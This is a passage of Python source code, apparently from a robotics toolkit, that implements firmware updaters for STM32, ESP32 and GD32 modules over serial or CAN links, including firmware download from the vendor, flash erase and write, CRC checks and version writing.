"Update Network STM32"
)
else:
self.ui.update_network_stm32.setText(
"네트워크 모듈 초기화"
)
else:
self.ui.update_network_stm32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_stm32.setEnabled(True)
if self.ui.is_english:
self.ui.update_stm32_modules.setText(
"Update STM32 Modules."
)
else:
self.ui.update_stm32_modules.setText(
"모듈 초기화"
)
self.ui.update_network_esp32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_esp32.setEnabled(True)
@staticmethod
def __delay(span):
init_time = time.perf_counter()
while time.perf_counter() - init_time < span:
pass
return
@staticmethod
def __set_network_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0xA4
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
@staticmethod
def __set_module_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0x09
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
# TODO: Use retry decorator here
def send_end_flash_data(self, module_type: str, module_id: int,
end_flash_data: bytearray) -> None:
# Write end-flash data until success
end_flash_success = False
while not end_flash_success:
# Erase page (send erase request and receive erase response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=0x0801F800
)
# TODO: Remove magic number of dest_addr above, try using flash_mem
if not erase_page_success:
continue
# Send data
checksum = self.send_firmware_data(
module_id, seq_num=0, bin_data=end_flash_data, crc_val=0
)
# CRC on current page (send CRC request and receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=0x0801F800
)
if not crc_page_success:
continue
end_flash_success = True
# print(f"End flash is written for {module_type} ({module_id})")
def get_firmware_command(self, module_id: int, rot_stype: int,
rot_scmd: int, crc32: int, page_addr: int) -> str:
message = dict()
message["c"] = 0x0D
""" SID is 12-bits length in MODI CAN.
To fully utilize its capacity, we split 12-bits into 4 and 8 bits.
First 4 bits include rot_scmd information.
And the remaining bits represent rot_stype.
"""
message["s"] = (rot_scmd << 8) | rot_stype
message["d"] = module_id
""" The firmware command data to be sent is 8-bytes length.
Where the first 4 bytes consist of CRC-32 information.
Last 4 bytes represent page address information.
"""
crc32_and_page_addr_data = bytearray(8)
for i in range(4):
crc32_and_page_addr_data[i] = crc32 & 0xFF
crc32 >>= 8
crc32_and_page_addr_data[4 + i] = page_addr & 0xFF
page_addr >>= 8
message["b"] = b64encode(
bytes(crc32_and_page_addr_data)
).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def get_firmware_data(self, module_id: int, seq_num: int,
bin_data: bytes) -> str:
message = dict()
message["c"] = 0x0B
message["s"] = seq_num
message["d"] = module_id
message["b"] = b64encode(bytes(bin_data)).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def calc_crc32(self, data: bytes, crc: int) -> int:
crc ^= int.from_bytes(data, byteorder='little', signed=False)
for _ in range(32):
if crc & (1 << 31) != 0:
crc = (crc << 1) ^ 0x4C11DB7
else:
crc <<= 1
crc &= 0xFFFFFFFF
return crc
def calc_crc64(self, data: bytes, checksum: int) -> int:
checksum = self.calc_crc32(data[:4], checksum)
checksum = self.calc_crc32(data[4:], checksum)
return checksum
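    # Worked example (illustrative): calc_crc32() implements the standard
    # CRC-32 polynomial 0x04C11DB7 in its normal (non-reflected) form over a
    # little-endian 32-bit word, so
    #     calc_crc32(b'\x01\x00\x00\x00', 0) == 0x04C11DB7
    # and calc_crc64() simply chains two such 4-byte updates over each
    # 8-byte firmware chunk.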
def send_firmware_command(self, oper_type: str, module_id: int,
crc_val: int, dest_addr: int,
page_addr: int = 0) -> bool:
rot_scmd = 2 if oper_type == "erase" else 1
# Send firmware command request
request_message = self.get_firmware_command(
module_id, 1, rot_scmd, crc_val, page_addr=dest_addr + page_addr
)
self.__conn.send_nowait(request_message)
return self.receive_command_response()
def receive_command_response(self, response_delay: float = 0.001,
response_timeout: float = 5,
max_response_error_count: int = 75) -> bool:
# Receive firmware command response
response_wait_time = 0
while not self.response_flag:
# Calculate timeout at each iteration
time.sleep(response_delay)
response_wait_time += response_delay
# If timed-out
if response_wait_time > response_timeout:
raise Exception("Response timed-out")
# If error is raised
if self.response_error_flag:
self.response_error_count += 1
if self.response_error_count > max_response_error_count:
raise Exception("Response Errored")
self.response_error_flag = False
return False
self.response_flag = False
return True
def send_firmware_data(self, module_id: int, seq_num: int, bin_data: bytes,
crc_val: int) -> int:
# Send firmware data
data_message = self.get_firmware_data(
module_id, seq_num=seq_num, bin_data=bin_data
)
self.__conn.send_nowait(data_message)
# Calculate crc32 checksum twice
checksum = self.calc_crc64(data=bin_data, checksum=crc_val)
return checksum
def __progress_bar(self, current: int, total: int) -> str:
curr_bar = 50 * current // total
rest_bar = 50 - curr_bar
return f"[{'=' * curr_bar}>{'.' * rest_bar}]"
def __read_conn(self):
while True:
self.__handle_message()
time.sleep(0.001)
if not self.__running:
break
def __handle_message(self):
msg = self.__conn.recv()
if not msg:
return
try:
ins, sid, did, data, length = decode_message(msg)
except json.JSONDecodeError:
return
command = {
0x05: self.__assign_network_id,
0x0A: self.__update_warning,
0x0C: self.__update_firmware_state
}.get(ins)
if command:
command(sid, data)
def __update_firmware_state(self, sid: int, data: str):
message_decoded = unpack_data(data, (4, 1))
stream_state = message_decoded[1]
if stream_state == self.CRC_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.CRC_COMPLETE:
self.update_response(response=True)
elif stream_state == self.ERASE_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.ERASE_COMPLETE:
self.update_response(response=True)
def __update_warning(self, sid: int, data: str) -> None:
module_uuid = unpack_data(data, (6, 1))[0]
warning_type = unpack_data(data, (6, 1))[1]
# If warning shows current module works fine, return immediately
if not warning_type:
return
module_id = sid
module_type = get_module_type_from_uuid(module_uuid)
if warning_type == 1:
self.check_to_update_firmware(module_id)
elif warning_type == 2:
# Note that more than one warning type 2 message can be received
if self.update_in_progress:
self.add_to_waitlist(module_id, module_type)
else:
self.update_module(module_id, module_type)
def retry(exception_to_catch):
def decorator(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except exception_to_catch:
return wrapper(*args, **kwargs)
return wrapper
return decorator
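# A minimal illustration of the retry decorator above, which the updater
# applies to __send_pkt() below: the wrapped call is re-invoked whenever the
# named exception is raised. Note that the retry is recursive and unbounded,
# so a persistent failure will keep retrying.
#
#     @retry(serial.SerialException)
#     def read_one_byte(port):
#         return port.read(1)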
class ESP32FirmwareUpdater(serial.Serial):
DEVICE_READY = 0x2B
DEVICE_SYNC = 0x08
SPI_ATTACH_REQ = 0xD
SPI_FLASH_SET = 0xB
ESP_FLASH_BEGIN = 0x02
ESP_FLASH_DATA = 0x03
ESP_FLASH_END = 0x04
ESP_FLASH_BLOCK = 0x200
ESP_FLASH_CHUNK = 0x4000
ESP_CHECKSUM_MAGIC = 0xEF
def __init__(self):
modi_ports = list_modi_ports()
if not modi_ports:
raise serial.SerialException("No MODI port is connected")
super().__init__(modi_ports[0].device, timeout=0.1, baudrate=921600)
print(f"Connecting to MODI network module at {modi_ports[0].device}")
self.__address = [0x1000, 0x8000, 0XD000, 0x10000, 0xD0000]
self.file_path = [
'bootloader.bin', 'partitions.bin', 'ota_data_initial.bin',
'modi_ota_factory.bin', 'esp32.bin'
]
self.id = None
self.version = None
self.__version_to_update = None
self.update_in_progress = False
self.ui = None
def set_ui(self, ui):
self.ui = ui
def update_firmware(self, force=False):
self.update_in_progress = True
self.__boot_to_app()
self.__version_to_update = self.__get_latest_version()
self.id = self.__get_esp_id()
self.version = self.__get_esp_version()
if self.version and self.version == self.__version_to_update:
if not force and not self.ui:
response = input(
f"ESP version already up to date (v{self.version})."
f" Do you still want to proceed? [y/n]: ")
if 'y' not in response:
return
print(f"Updating v{self.version} to v{self.__version_to_update}")
firmware_buffer = self.__compose_binary_firmware()
self.__device_ready()
self.__device_sync()
self.__flash_attach()
self.__set_flash_param()
manager = None
self.__write_binary_firmware(firmware_buffer, manager)
print("Booting to application...")
self.__wait_for_json()
self.__boot_to_app()
time.sleep(1)
self.__set_esp_version(self.__version_to_update)
print("ESP firmware update is complete!!")
self.update_in_progress = False
time.sleep(1)
self.flushInput()
self.flushOutput()
self.close()
if self.ui:
self.ui.update_stm32_modules.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_stm32_modules.setEnabled(True)
self.ui.update_network_stm32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_stm32.setEnabled(True)
if self.ui.is_english:
self.ui.update_network_esp32.setText(
"Update Network ESP32"
)
else:
self.ui.update_network_esp32.setText(
"네트워크 모듈 업데이트"
)
def __device_ready(self):
print("Redirecting connection to esp device...")
self.write(b'{"c":43,"s":0,"d":4095,"b":"AA==","l":1}')
def __device_sync(self):
print("Syncing the esp device...")
sync_pkt = self.__parse_pkt([
0x0, self.DEVICE_SYNC, 0x24, 0, 0, 0, 0, 0, 0x7, 0x7, 0x12, 0x20
] + 32 * [0x55])
self.__send_pkt(sync_pkt, timeout=10, continuous=True)
print("Sync Complete")
def __flash_attach(self):
print("Attaching flash to esp device..")
attach_pkt = self.__parse_pkt([
0x0, self.SPI_ATTACH_REQ, 0x8
] + 13 * [0])
self.__send_pkt(attach_pkt, timeout=10)
print("Flash attach Complete")
def __set_flash_param(self):
print("Setting esp flash parameter...")
param_data = [0] * 32
fl_id, total_size, block_size, sector_size, page_size, status_mask = (
0, 2 * 1024 * 1024, 64 * 1024, 4 * 1024, 256, 0xFFFF
)
param_data[1] = self.SPI_FLASH_SET
param_data[2] = 0x18
param_data[8:12] = int.to_bytes(fl_id, length=4, byteorder='little')
param_data[12:16] = int.to_bytes(
total_size, length=4, byteorder='little'
)
param_data[16:20] = int.to_bytes(
block_size, length=4, byteorder='little'
)
param_data[20:24] = int.to_bytes(
sector_size, length=4, byteorder='little'
)
param_data[24:28] = int.to_bytes(
page_size, length=4, byteorder='little'
)
param_data[28:32] = int.to_bytes(
status_mask, length=4, byteorder='little'
)
param_pkt = self.__parse_pkt(param_data)
self.__send_pkt(param_pkt, timeout=10)
print("Parameter set complete")
@staticmethod
def __parse_pkt(data):
pkt = bytes(data)
pkt = pkt.replace(b'\xdb', b'\xdb\xdd').replace(b'\xc0', b'\xdb\xdc')
pkt = b'\xc0' + pkt + b'\xc0'
return pkt
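    # __parse_pkt() applies SLIP-style framing as expected by the ESP32 serial
    # bootloader: 0xDB in the payload is escaped to 0xDB 0xDD, 0xC0 to
    # 0xDB 0xDC, and the escaped payload is wrapped in 0xC0 delimiters, so a
    # one-byte payload [0xC0] goes out on the wire as C0 DB DC C0.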
@retry(Exception)
def __send_pkt(self, pkt, wait=True, timeout=None, continuous=False):
self.write(pkt)
self.reset_input_buffer()
if wait:
cmd = bytearray(pkt)[2]
init_time = time.time()
while not timeout or time.time() - init_time < timeout:
if continuous:
time.sleep(0.1)
else:
time.sleep(0.01)
recv_pkt = self.__read_slip()
if not recv_pkt:
if continuous:
self.__send_pkt(pkt, wait=False)
continue
recv_cmd = bytearray(recv_pkt)[2]
if cmd == recv_cmd:
if bytearray(recv_pkt)[1] != 0x01:
raise Exception
return True
elif continuous:
self.__send_pkt(pkt, wait=False)
print("Sending Again...")
raise Exception("Timeout Expired!")
def __read_slip(self):
slip_pkt = b''
while slip_pkt != b'\xc0':
slip_pkt = self.read()
if slip_pkt == b'':
return b''
slip_pkt += self.read_until(b'\xc0')
return slip_pkt
def __read_json(self):
json_pkt = b''
while json_pkt != b'{':
json_pkt = self.read()
if json_pkt == b'':
return ''
json_pkt += self.read_until(b'}')
return json_pkt
def __wait_for_json(self):
json_msg = self.__read_json()
while not json_msg:
json_msg = self.__read_json()
time.sleep(0.01)
return json_msg
def __get_esp_id(self):
json_msg = json.loads(self.__wait_for_json())
while json_msg['c'] != 0:
json_msg = json.loads(self.__wait_for_json())
return json_msg['s']
def __get_esp_version(self):
get_version_pkt = b'{"c":160,"s":25,"d":4095,"b":"AAAAAAAAAA==","l":8}'
self.write(get_version_pkt)
json_msg = json.loads(self.__wait_for_json())
init_time = time.time()
while json_msg['c'] != 0xA1:
self.write(get_version_pkt)
json_msg = json.loads(self.__wait_for_json())
if time.time() - init_time > 1:
return None
ver = b64decode(json_msg['b']).lstrip(b'\x00')
return ver.decode('ascii')
def __set_esp_version(self, version_text: str):
print(f"Writing version info (v{version_text})")
version_byte = version_text.encode('ascii')
version_byte = b'\x00' * (8 - len(version_byte)) + version_byte
version_text = b64encode(version_byte).decode('utf8')
version_msg = '{' + f'"c":160,"s":24,"d":4095,' \
f'"b":"{version_text}","l":8' + '}'
version_msg_enc = version_msg.encode('utf8')
self.write(version_msg_enc)
while json.loads(self.__wait_for_json())['c'] != 0xA1:
time.sleep(0.5)
self.__boot_to_app()
self.write(version_msg.encode('utf8'))
print("The version info has been set!!")
def __compose_binary_firmware(self):
binary_firmware = b''
for i, bin_path in enumerate(self.file_path):
if self.ui:
if i == 2:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
elif i == 3:
root_path = (
'https://download.luxrobo.com/modi-ota-firmware/'
'ota.zip'
)
else:
root_path = (
'https://download.luxrobo.com/modi-esp32-firmware/'
'esp.zip'
)
if i != 2:
try:
with ur.urlopen(root_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
'Failed to download firmware. Check your internet.'
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_data = zip_content.read(bin_path)
elif i == 2:
firmware_path = path.join(root_path, bin_path)
if self.ui and self.ui.installation:
firmware_path = path.dirname(__file__).replace(
'util', bin_path
)
with open(firmware_path, 'rb') as bin_file:
bin_data = bin_file.read()
else:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
firmware_path = path.join(root_path, bin_path)
with open(firmware_path, 'rb') as bin_file:
bin_data = bin_file.read()
binary_firmware += bin_data
if i < len(self.__address) - 1:
binary_firmware += b'\xFF' * (
self.__address[i + 1] - self.__address[i] - len(bin_data)
)
return binary_firmware
def __get_latest_version(self):
if self.ui:
version_path = (
'https://download.luxrobo.com/modi-esp32-firmware/version.txt'
)
version_info = None
for line in ur.urlopen(version_path, timeout=5):
version_info = line.decode('utf-8').lstrip('v').rstrip('\n')
else:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
version_path = path.join(root_path, 'esp_version.txt')
with open(version_path, 'r') as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
return version_info
def __erase_chunk(self, size, offset):
num_blocks = size // self.ESP_FLASH_BLOCK + 1
erase_data = [0] * 24
erase_data[1] = self.ESP_FLASH_BEGIN
erase_data[2] = 0x10
erase_data[8:12] = int.to_bytes(size, length=4, byteorder='little')
erase_data[12:16] = int.to_bytes(
num_blocks, length=4, byteorder='little'
)
erase_data[16:20] = int.to_bytes(
self.ESP_FLASH_BLOCK, length=4, byteorder='little'
)
erase_data[20:24] = int.to_bytes(
offset, length=4, byteorder='little'
)
erase_pkt = self.__parse_pkt(erase_data)
self.__send_pkt(erase_pkt, timeout=10)
def __write_flash_block(self, data, seq_block):
size = len(data)
block_data = [0] * (size + 24)
checksum = self.ESP_CHECKSUM_MAGIC
block_data[1] = self.ESP_FLASH_DATA
block_data[2:4] = int.to_bytes(size + 16, length=2, byteorder='little')
block_data[8:12] = int.to_bytes(size, length=4, byteorder='little')
block_data[12:16] = int.to_bytes(
seq_block, length=4, byteorder='little'
)
for i in range(size):
block_data[24 + i] = data[i]
checksum ^= (0xFF & data[i])
block_data[4:8] = int.to_bytes(checksum, length=4, byteorder='little')
block_pkt = self.__parse_pkt(block_data)
self.__send_pkt(block_pkt)
def __write_binary_firmware(self, binary_firmware: bytes, manager):
chunk_queue = []
num_blocks = len(binary_firmware) // self.ESP_FLASH_BLOCK + 1
while binary_firmware:
if self.ESP_FLASH_CHUNK < len(binary_firmware):
chunk_queue.append(binary_firmware[:self.ESP_FLASH_CHUNK])
binary_firmware = binary_firmware[self.ESP_FLASH_CHUNK:]
else:
chunk_queue.append(binary_firmware[:])
binary_firmware = b''
blocks_downloaded = 0
print("Start uploading firmware data...")
for seq, chunk in enumerate(chunk_queue):
self.__erase_chunk(
len(chunk), self.__address[0] + seq * self.ESP_FLASH_CHUNK
)
blocks_downloaded += self.__write_chunk(
chunk, blocks_downloaded, num_blocks, manager
)
if manager:
manager.quit()
if self.ui:
if self.ui.is_english:
self.ui.update_network_esp32.setText(
"Network ESP32 update is in progress. (100%)"
)
else:
self.ui.update_network_esp32.setText(
"네트워크 모듈 업데이트가 진행중입니다. (100%)"
)
print(f"\r{self.__progress_bar(1, 1)}")
print("Firmware Upload Complete")
def __write_chunk(self, chunk, curr_seq, total_seq, manager):
block_queue = []
while chunk:
if self.ESP_FLASH_BLOCK < len(chunk):
block_queue.append(chunk[:self.ESP_FLASH_BLOCK])
chunk = chunk[self.ESP_FLASH_BLOCK:]
else:
block_queue.append(chunk[:])
chunk = b''
for seq, block in enumerate(block_queue):
if manager:
manager.status = self.__progress_bar(curr_seq + seq, total_seq)
if self.ui:
if self.ui.is_english:
self.ui.update_network_esp32.setText(
f"Network ESP32 update is in progress. "
f"({int((curr_seq+seq)/total_seq*100)}%)"
)
else:
self.ui.update_network_esp32.setText(
f"네트워크 모듈 업데이트가 진행중입니다. "
f"({int((curr_seq+seq)/total_seq*100)}%)"
)
print(
f'\r{self.__progress_bar(curr_seq + seq, total_seq)}', end=''
)
self.__write_flash_block(block, seq)
return len(block_queue)
def __boot_to_app(self):
self.write(b'{"c":160,"s":0,"d":174,"b":"AAAAAAAAAA==","l":8}')
@staticmethod
def __progress_bar(current: int, total: int) -> str:
curr_bar = 70 * current // total
rest_bar = 70 - curr_bar
return f"Firmware Upload: [{'=' * curr_bar}>{'.' * rest_bar}] " \
f"{100 * current / total:3.2f}%"
class GD32FirmwareUpdater:
"""GD32 Firmware Updater: Updates a firmware of given MODI2 module"""
NO_ERROR = 0
UPDATE_READY = 1
WRITE_FAIL = 2
VERIFY_FAIL = 3
CRC_ERROR = 4
CRC_COMPLETE = 5
ERASE_ERROR = 6
ERASE_COMPLETE = 7
def __init__(
self, is_os_update=True, target_ids=(0xFFF, ), conn_type='ser'
):
self.conn_type = conn_type
self.update_network_base = False
self.__conn = self.__open_conn()
self.__conn.open_conn()
th.Thread(target=self.__read_conn, daemon=True).start()
self.__target_ids = target_ids
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.__running = True
self.__is_os_update = is_os_update
self.update_event = th.Event()
self.update_in_progress = False
self.modules_to_update = []
self.modules_updated = []
self.network_id = None
self.ui = None
self.request_network_id()
def set_ui(self, ui):
self.ui = ui
def request_network_id(self):
self.__conn.send_nowait(
parse_message(0x28, 0xFFF, 0xFFF, (0xFF, 0x0F))
)
def __assign_network_id(self, sid, data):
module_uuid = unpack_data(data, (6, 1))[0]
module_type = get_module_type_from_uuid(module_uuid)
if module_type == 'network':
self.network_id = sid
def update_module_firmware(self, update_network_base=False):
if update_network_base:
self.update_network_base = True
# Retrieve the network id only and update it accordingly
timeout, delay = 3, 0.1
while not self.network_id:
if timeout <= 0:
if not self.update_in_progress:
print(
'Could not retrieve network id, '
'broadcast id will be used instead.'
)
self.network_id = 0xFFF
break
self.request_network_id()
timeout -= delay
time.sleep(delay)
"""
If the network id could not be retrieved, the network is most likely
already in the middle of an update. In that case we skip sending the
request to update the base firmware.
"""
if self.network_id != 0xFFF:
print(
f'Sending a request to update firmware of network '
f'({self.network_id})'
)
self.request_to_update_firmware(
self.network_id, is_network=True
)
else:
self.reset_state()
for target in self.__target_ids:
self.request_to_update_firmware(target)
self.update_event.wait()
print("Module firmwares have been updated!")
self.close()
def close(self):
self.__running = False
time.sleep(0.5)
self.__conn.close_conn()
def __open_conn(self):
if is_on_pi() and self.conn_type == 'can':
return im('modi.task.can_task').CanTask()
else:
return im('modi.task.ser_task').SerTask()
def reinitialize_serial_connection(self):
print('Temporarily disconnecting the serial connection...')
self.close()
print('Re-init serial connection for the update, in 2 seconds...')
time.sleep(2)
self.__conn = self.__open_conn()
self.__conn.open_conn()
self.__running = True
th.Thread(target=self.__read_conn, daemon=True).start()
def reset_state(self, update_in_progress: bool = False) -> None:
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.update_in_progress = False
if not update_in_progress:
print('Make sure you have connected module(s) to update')
print("Resetting firmware updater's state")
self.modules_to_update = []
self.modules_updated = []
def request_to_update_firmware(self, module_id, is_network=False) -> None:
# Remove firmware of MODI modules (Removes EndFlash)
if is_network:
firmware_update_message = self.__set_network_state(
module_id, 4, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
self.reinitialize_serial_connection()
else:
firmware_update_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
print('Firmware update has been requested')
def check_to_update_firmware(self, module_id: int) -> None:
firmware_update_ready_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE_READY, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_ready_message)
def add_to_waitlist(self, module_id: int, module_type: str) -> None:
# Check if the input module already exists in the list
for curr_module_id, curr_module_type in self.modules_to_update:
if module_id == curr_module_id:
return
# Check if module is already updated
for curr_module_id, curr_module_type in self.modules_updated:
if module_id == curr_module_id:
return
print(f"Adding {module_type} ({module_id}) to waiting list..."
f"{' ' * 60}")
# Add the module to the waiting list
module_elem = module_id, module_type
self.modules_to_update.append(module_elem)
def update_module(self, module_id: int, module_type: str) -> None:
if self.update_in_progress:
return
self.update_in_progress = True
updater_thread = th.Thread(
target=self.__update_firmware, args=(module_id, module_type)
)
updater_thread.daemon = True
updater_thread.start()
def update_response(self, response: bool,
is_error_response: bool = False) -> None:
if not is_error_response:
self.response_flag = response
else:
self.response_error_flag = response
def __update_firmware(self, module_id: int, module_type: str) -> None:
self.update_in_progress = True
self.modules_updated.append((module_id, module_type))
# Init base root_path, utilizing local binary files
root_path = (
path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'gd32'
)
)
if self.__is_os_update:
if self.ui:
if self.update_network_base:
root_path = (
'https://download.luxrobo.com/modi-network-os'
)
zip_path = path.join(root_path, 'network.zip')
bin_path = 'network.bin'
else:
root_path = (
'https://download.luxrobo.com/modi-skeleton-mobile'
)
zip_path = path.join(root_path, 'skeleton.zip')
bin_path = (
path.join(f'skeleton/{module_type.lower()}.bin')
if module_type != 'env' else
path.join('skeleton/environment.bin')
)
try:
with ur.urlopen(zip_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
"Failed to download firmware. Check your internet."
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_buffer = zip_content.read(bin_path)
else:
bin_path = path.join(root_path, f"{module_type.lower()}.bin")
with open(bin_path, 'rb') as bin_file:
bin_buffer = bin_file.read()
# Init metadata of the bytes loaded
page_size = 0x800
flash_memory_addr = 0x08000000
bin_size = sys.getsizeof(bin_buffer)
bin_begin = 0x4800
bin_end = bin_size - ((bin_size - bin_begin) % page_size)
page_offset = 0
for page_begin in range(bin_begin, bin_end + 1, page_size):
progress = 100 * page_begin // bin_end
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(page_begin, bin_end)} "
f"{progress}%", end=''
)
page_end = page_begin + page_size
curr_page = bin_buffer[page_begin:page_end]
# Skip current page if empty
if not sum(curr_page):
continue
# Erase page (send erase request and receive its response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not erase_page_success:
page_begin -= page_size
continue
# Copy current page data to the module's memory
checksum = 0
for curr_ptr in range(0, page_size, 8):
if page_begin + curr_ptr >= bin_size:
break
curr_data = curr_page[curr_ptr:curr_ptr + 8]
checksum = self.send_firmware_data(
module_id,
seq_num=curr_ptr // 8,
bin_data=curr_data,
crc_val=checksum
)
self.__delay(0.002)
# CRC on current page (send CRC request / receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not crc_page_success:
page_begin -= page_size
time.sleep(0.01)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(1, 1)} 100%"
)
# Get version info from version_path, using appropriate methods
version_info, version_file = None, 'version.txt'
if self.ui:
version_path = path.join(root_path, version_file)
for line in ur.urlopen(version_path, timeout=5):
version_info = line.decode('utf-8').lstrip('v')
else:
if self.update_network_base:
version_file = 'base_' + version_file
version_path = path.join(root_path, version_file)
with open(version_path) as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
version_digits = [int(digit) for digit in version_info.split('.')]
""" Version number is formed by concatenating all three version bits
e.g. 2.2.4 -> 010 00010 00000100 -> 0100 0010 0000 0100
"""
version = (
version_digits[0] << 13 |
version_digits[1] << 8 |
version_digits[2]
)
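# Editor's note (illustration only): the shifts above pack the version as
# 3 bits (major) + 5 bits (minor) + 8 bits (patch), so e.g.
#   (2 << 13) | (2 << 8) | 4 == 0x4204   # v2.2.4, matching the docstring
# and the fields can be recovered with
#   major, minor, patch = v >> 13, (v >> 8) & 0x1F, v & 0xFF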
# Set end-flash data to be sent at the end of the firmware update
end_flash_data = bytearray(8)
end_flash_data[0] = 0xAA
end_flash_data[6] = version & 0xFF
end_flash_data[7] = (version >> 8) & 0xFF
self.send_end_flash_data(module_type, module_id, end_flash_data)
print(
f'Version info (v{version_info}) has been written to its firmware!'
)
# Firmware update flag down, resetting used flags
print(f'Firmware update is done for {module_type} ({module_id})')
self.reset_state(update_in_progress=True)
if self.modules_to_update:
print("Processing the next module to update the firmware..")
next_module_id, next_module_type = self.modules_to_update.pop(0)
self.__update_firmware(next_module_id, next_module_type)
else:
# Reboot all connected modules
reboot_message = self.__set_module_state(
0xFFF, Module.REBOOT, Module.PNP_OFF
)
self.__conn.send_nowait(reboot_message)
print("Reboot message has been sent to all connected modules")
# self.reset_state()
if self.update_network_base:
self.reinitialize_serial_connection()
time.sleep(0.5)
time.sleep(1)
self.update_in_progress = False
self.update_event.set()
@staticmethod
def __delay(span):
init_time = time.perf_counter()
while time.perf_counter() - init_time < span:
pass
return
@staticmethod
def __set_network_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0xA4
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
@staticmethod
def __set_module_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0x09
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
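# Editor's sketch (illustration only): the state messages built above are
# plain JSON with a base64-encoded 2-byte body. A hypothetical helper that
# inverts the encoding, useful when inspecting traffic:
def _decode_state_message(message: str):
    import json as _json
    from base64 import b64decode
    msg = _json.loads(message)
    module_state, pnp_state = b64decode(msg["b"])
    return msg["c"], msg["d"], module_state, pnp_state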
# TODO: Use retry decorator here
def send_end_flash_data(self, module_type: str, module_id: int,
end_flash_data: bytearray) -> None:
# Write end-flash data until success
end_flash_success = False
while not end_flash_success:
# Erase page (send erase request and receive erase response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=0x0800F800
)
# TODO: Remove magic number of dest_addr above, try using flash_mem
if not erase_page_success:
continue
# Send data
checksum = self.send_firmware_data(
module_id, seq_num=0, bin_data=end_flash_data, crc_val=0
)
# CRC on current page (send CRC request and receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=0x0800F800
)
if not crc_page_success:
continue
end_flash_success = True
# print(f"End flash is written for {module_type} ({module_id})")
def get_firmware_command(self, module_id: int, rot_stype: int,
rot_scmd: int, crc32: int, page_addr: int) -> str:
message = dict()
message["c"] = 0x0D
""" SID is 12-bits length in MODI CAN.
To fully utilize its capacity, we split 12-bits into 4 and 8 bits.
First 4 bits include rot_scmd information.
And the remaining bits represent rot_stype.
"""
message["s"] = (rot_scmd << 8) | rot_stype
message["d"] = module_id
""" The firmware command data to be sent is 8-bytes length.
Where the first 4 bytes consist of CRC-32 information.
Last 4 bytes represent page address information.
"""
crc32_and_page_addr_data = bytearray(8)
for i in range(4):
crc32_and_page_addr_data[i] = crc32 & 0xFF
crc32 >>= 8
crc32_and_page_addr_data[4 + i] = page_addr & 0xFF
page_addr >>= 8
message["b"] = b64encode(
bytes(crc32_and_page_addr_data)
).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
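# Editor's sketch (illustration only): the command built above packs the
# CRC-32 into bytes 0-3 and the page address into bytes 4-7 of the body
# (both little-endian), and packs rot_scmd / rot_stype into the upper 4 /
# lower 8 bits of the SID. A hypothetical decoder for such a message:
def _decode_firmware_command(message: str):
    import json as _json
    from base64 import b64decode
    msg = _json.loads(message)
    body = b64decode(msg["b"])
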